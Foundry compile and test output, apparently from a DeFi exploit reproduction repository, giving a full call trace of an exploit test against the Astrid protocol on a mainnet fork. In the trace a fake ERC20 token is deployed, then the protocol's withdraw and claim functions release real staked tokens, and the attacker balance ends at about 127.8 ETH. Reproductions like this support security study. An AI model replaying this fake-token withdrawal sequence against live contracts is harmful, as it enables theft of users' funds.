Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.27s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
   --> src/test/2023-10/Astrid_exp.sol:105:5:
    |
105 |     IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
    |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2462): Visibility for constructor is ignored. If you want the contract to be non-deployable, making it "abstract" is sufficient.
  --> src/test/2023-10/Astrid_exp.sol:24:5:
   |
24 |     constructor(address _stakedTokenAddress, uint256 bal) public {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-10/Astrid_exp.sol:61:9:
   |
61 |         address user
   |         ^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-10/Astrid_exp.sol:71:9:
   |
71 |         uint256 a
   |         ^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2023-10/Astrid_exp.sol:146:78:
    |
146 |     function uniswapV3SwapCallback(int256 amount0Delta, int256 amount1Delta, bytes calldata data) external {
    |                                                                              ^^^^^^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2023-10/Astrid_exp.sol:66:5:
   |
66 |     function stakedTokenAddress() external returns (address) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to view
  --> src/test/2023-10/Astrid_exp.sol:70:5:
   |
70 |     function scaledBalanceToBalance(
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 479.20ms (3.59ms CPU time)

Ran 1 test for src/test/2023-10/Astrid_exp.sol:ASTTest
[PASS] testExpolit() (gas: 4070046)
Logs:
  Attacker Eth balance before attack:: 0.000000000000000000
  Attacker Eth balance after attack:: 127.797499079942863578

Traces:
  [5830] ASTTest::setUp()
    ├─ [0] VM::createSelectFork("<rpc url>", 18448167 [1.844e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [4335246] ASTTest::testExpolit()
    ├─ [0] VM::deal(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker Eth balance before attack:", val: 0, decimals: 18)
    ├─ [33968] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   ├─ [8263] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   ├─ [2820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   ├─ [15088] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [delegatecall]
    │   │   └─ ← [Return] 64176037513415148812 [6.417e19]
    │   └─ ← [Return] 64176037513415148812 [6.417e19]
    ├─ [602106] → new MyERC20@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 4: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   @ 3: 0 → 0x0000000000000000000000ae7ab96520de3a18e5e111b5eaab095312d7fe8412
    │   └─ ← [Return] 2782 bytes of code
    ├─ [47107] MyERC20::mint(10000000000000000000000 [1e22])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000000000000000000 [1e22])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   @ 0: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   └─ ← [Stop]
    ├─ [25056] MyERC20::approve(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x3e7d76ec893a25d90366b2467df0ae7e96bbd0f5ae48ca3e265bc7e1ad3111f3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [495212] 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70::withdraw(MyERC20: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 64176037513415148812 [6.417e19])
    │   ├─ [490183] 0x4D5B4B9Ccf52bBcFE7B71b3038D8577293779E0C::withdraw(MyERC20: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], 64176037513415148812 [6.417e19]) [delegatecall]
    │   │   ├─ [847] MyERC20::balanceOf(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   ├─ [1147] MyERC20::allowance(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   │   ├─ [685] MyERC20::scaledBalanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [26555] MyERC20::transferFrom(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 64176037513415148812 [6.417e19])
    │   │   │   ├─ emit Transfer(from: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, value: 64176037513415148812 [6.417e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa2d31b3d5aa2f8a8f7a95a9a3256c1687bc49f41972c2b1c83141ba6d08741e1: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   │   │   @ 0x3e7d76ec893a25d90366b2467df0ae7e96bbd0f5ae48ca3e265bc7e1ad3111f3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffc8560e9e698bf3af3
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021a9f41b3a14aff3af4
    │   │   │   └─ ← [Return] true
    │   │   ├─ [685] MyERC20::scaledBalanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─  emit topic 0: 0x196e6601eb68141737e4636af773e3013089d698090efd395ba859863e1f2f9c
    │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │           data: 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f0000000000000000000000000000000000000000000000037a9f16196740c50c0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [654] MyERC20::stakedTokenAddress() [staticcall]
    │   │   │   └─ ← [Return] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84
    │   │   ├─ [716] MyERC20::scaledBalanceToBalance(0) [staticcall]
    │   │   │   └─ ← [Return] 64176037513415148812 [6.417e19]
    │   │   ├─ [6468] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   ├─ [3088] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [delegatecall]
    │   │   │   │   └─ ← [Return] 64176037513415148812 [6.417e19]
    │   │   │   └─ ← [Return] 64176037513415148812 [6.417e19]
    │   │   ├─ [3505] MyERC20::burn(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 64176037513415148812 [6.417e19])
    │   │   │   ├─ emit Transfer(from: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, to: 0x0000000000000000000000000000000000000000, value: 64176037513415148812 [6.417e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa2d31b3d5aa2f8a8f7a95a9a3256c1687bc49f41972c2b1c83141ba6d08741e1: 0x0000000000000000000000000000000000000000000000037a9f16196740c50c → 0
    │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021a9f41b3a14aff3af4
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit WithdrawalProcessed(: 12)
    │   │   ├─  storage changes:
    │   │   │   @ 310: 12 → 13
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2905f: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f036a: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   │   @ 0x1b8dad150c4e78d67486c607270f99db043ce96498304a7a54f2625d2eb9086c: 0 → 1
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29063: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0367: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f036d: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29064: 0 → 0x00000000000000000000000000000000000000000000000000000001197f2701
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29060: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29061: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   │   @ 0xf506b8ba2782e73b1fd72dde1bb36c3dea6e07b10c9408281bdc1b9281a4107c: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0366: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29065: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 311: 12 → 13
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f036b: 0 → 0x00000000000000000000000000000000000000000000000000000001197f2701
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29068: 0 → 12
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f036c: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0368: 0 → 0x0000000000000000000000000000000000000000000000037a9f16196740c50c
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f036f: 0 → 12
    │   │   │   @ 0: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021a9f41b3a14aff3af4
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29066: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [91707] 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70::claim(0)
    │   ├─ [91181] 0x4D5B4B9Ccf52bBcFE7B71b3038D8577293779E0C::claim(0) [delegatecall]
    │   │   ├─ [654] MyERC20::stakedTokenAddress() [staticcall]
    │   │   │   └─ ← [Return] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84
    │   │   ├─ [39183] 0xae7ab96520DE3A18E5e111B5EaAb095312D7fE84::transfer(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 64176037513415148812 [6.417e19])
    │   │   │   ├─ [1763] 0xb8FFC3Cd6e7Cf5a098A1c92F48009765B24088Dc::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320)
    │   │   │   │   ├─ [820] 0x2b33CF282f867A7FF693A66e11B0FcC5552e4425::getApp(0xf1f3eb40f5bc1ad1344716ced8b8a0431d840b5783aea1fd01786bc26f35ac0f, 0x3ca7c3e38968823ccb4c78ea688df41356f182ae1d159e4ee608d30d68cef320) [delegatecall]
    │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   │   └─ ← [Return] 0x00000000000000000000000017144556fd3424edc8fc8a4c940b2d04936d17eb
    │   │   │   ├─ [35797] 0x17144556fd3424EDC8Fc8A4C940B2D04936d17eb::transfer(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 64176037513415148812 [6.417e19]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 64176037513415148812 [6.417e19])
    │   │   │   │   ├─ emit TransferShares(param0: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, param1: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 56078111362990188396 [5.607e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x0107b241bd6a5d44144b9c2b6e58faf70ba08caab4ceeaac1439dfd510157723: 0x0000000000000000000000000000000000000000000000030a3d792b89d3a76d → 1
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000030a3d792b89d3a76c
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ emit WithdrawalClaimed(param0: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: 12)
    │   │   ├─  storage changes:
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29067: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f036e: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f036b: 0x00000000000000000000000000000000000000000000000000000001197f2701 → 0x00000000000000000000000000000000000000000000000000000001197f2702
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29064: 0x00000000000000000000000000000000000000000000000000000001197f2701 → 0x00000000000000000000000000000000000000000000000000000001197f2702
    │   │   │   @ 0xf506b8ba2782e73b1fd72dde1bb36c3dea6e07b10c9408281bdc1b9281a4107c: 0x0000000000000000000000000000000000000000000000037a9f16196740c50c → 0
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [2486] 0xae78736Cd615f374D3085123A210448E74Fc6393::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   └─ ← [Return] 39165842900855519099 [3.916e19]
    ├─ [602106] → new MyERC20@0x2e234DAe75C793f67A35089C9d99245E1C58470b
    │   ├─  storage changes:
    │   │   @ 4: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   @ 3: 0 → 0x0000000000000000000000ae78736cd615f374d3085123a210448e74fc639312
    │   └─ ← [Return] 2782 bytes of code
    ├─ [47107] MyERC20::mint(10000000000000000000000 [1e22])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10000000000000000000000 [1e22])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   │   @ 0: 0 → 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000
    │   └─ ← [Stop]
    ├─ [25056] MyERC20::approve(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x3e7d76ec893a25d90366b2467df0ae7e96bbd0f5ae48ca3e265bc7e1ad3111f3: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [487030] 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70::withdraw(MyERC20: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 39165842900855519099 [3.916e19])
    │   ├─ [486501] 0x4D5B4B9Ccf52bBcFE7B71b3038D8577293779E0C::withdraw(MyERC20: [0x2e234DAe75C793f67A35089C9d99245E1C58470b], 39165842900855519099 [3.916e19]) [delegatecall]
    │   │   ├─ [847] MyERC20::balanceOf(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   └─ ← [Return] 10000000000000000000000 [1e22]
    │   │   ├─ [1147] MyERC20::allowance(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    │   │   ├─ [685] MyERC20::scaledBalanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [26555] MyERC20::transferFrom(ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 39165842900855519099 [3.916e19])
    │   │   │   ├─ emit Transfer(from: ASTTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, value: 39165842900855519099 [3.916e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021bfa57c31ed8008885
    │   │   │   │   @ 0x3e7d76ec893a25d90366b2467df0ae7e96bbd0f5ae48ca3e265bc7e1ad3111f3: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffde076f96425c08884
    │   │   │   │   @ 0xa2d31b3d5aa2f8a8f7a95a9a3256c1687bc49f41972c2b1c83141ba6d08741e1: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   │   └─ ← [Return] true
    │   │   ├─ [685] MyERC20::scaledBalanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 0
    │   │   ├─  emit topic 0: 0x196e6601eb68141737e4636af773e3013089d698090efd395ba859863e1f2f9c
    │   │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │           data: 0x0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b0000000000000000000000000000000000000000000000021f89069bda3f777b0000000000000000000000000000000000000000000000000000000000000000
    │   │   ├─ [654] MyERC20::stakedTokenAddress() [staticcall]
    │   │   │   └─ ← [Return] 0xae78736Cd615f374D3085123A210448E74Fc6393
    │   │   ├─ [716] MyERC20::scaledBalanceToBalance(0) [staticcall]
    │   │   │   └─ ← [Return] 39165842900855519099 [3.916e19]
    │   │   ├─ [486] 0xae78736Cd615f374D3085123A210448E74Fc6393::balanceOf(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70) [staticcall]
    │   │   │   └─ ← [Return] 39165842900855519099 [3.916e19]
    │   │   ├─ [3505] MyERC20::burn(0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, 39165842900855519099 [3.916e19])
    │   │   │   ├─ emit Transfer(from: 0xbAa87546cF87b5De1b0b52353A86792D40b8BA70, to: 0x0000000000000000000000000000000000000000, value: 39165842900855519099 [3.916e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xa2d31b3d5aa2f8a8f7a95a9a3256c1687bc49f41972c2b1c83141ba6d08741e1: 0x0000000000000000000000000000000000000000000000021f89069bda3f777b → 0
    │   │   │   │   @ 0: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021bfa57c31ed8008885
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit WithdrawalProcessed(: 13)
    │   │   ├─  storage changes:
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2906b: 0 → 0x0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2906f: 0 → 0x00000000000000000000000000000000000000000000000000000001197f2701
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f037b: 0 → 1
    │   │   │   @ 0: 0x00000000000000000000000000000000000000000000021e19e0c9bab2400000 → 0x00000000000000000000000000000000000000000000021bfa57c31ed8008885
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0376: 0 → 0x00000000000000000000000000000000000000000000000000000001197f2701
    │   │   │   @ 311: 13 → 14
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2906e: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0373: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29073: 0 → 13
    │   │   │   @ 0x1b8dad150c4e78d67486c607270f99db043ce96498304a7a54f2625d2eb9086c: 1 → 2
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0377: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29074: 0 → 1
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0371: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0372: 0 → 0x0000000000000000000000002e234dae75c793f67a35089c9d99245e1c58470b
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f037a: 0 → 13
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2906a: 0 → 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0378: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29070: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f2906c: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   │   @ 0x39da2db355130acf428d669fbf1c14faa9d51399a25b793fc254bbbde66f0375: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   │   @ 0x6cb86f5321f81c1c82ae55dbf56ca2af0cdc318d4d114735ab2f77f8d14d1480: 0 → 0x0000000000000000000000000000000000000000000000021f89069bda3f777b
    │   │   │   @ 0x058fb0173f35058577407e15ac6a36af164d6d3cd8190ecfd468063a20f29071: 0 → 0x00000000000000000000000000000000000000000000000000000000653ce553
    │   │   │   @ 310: 13 → 14
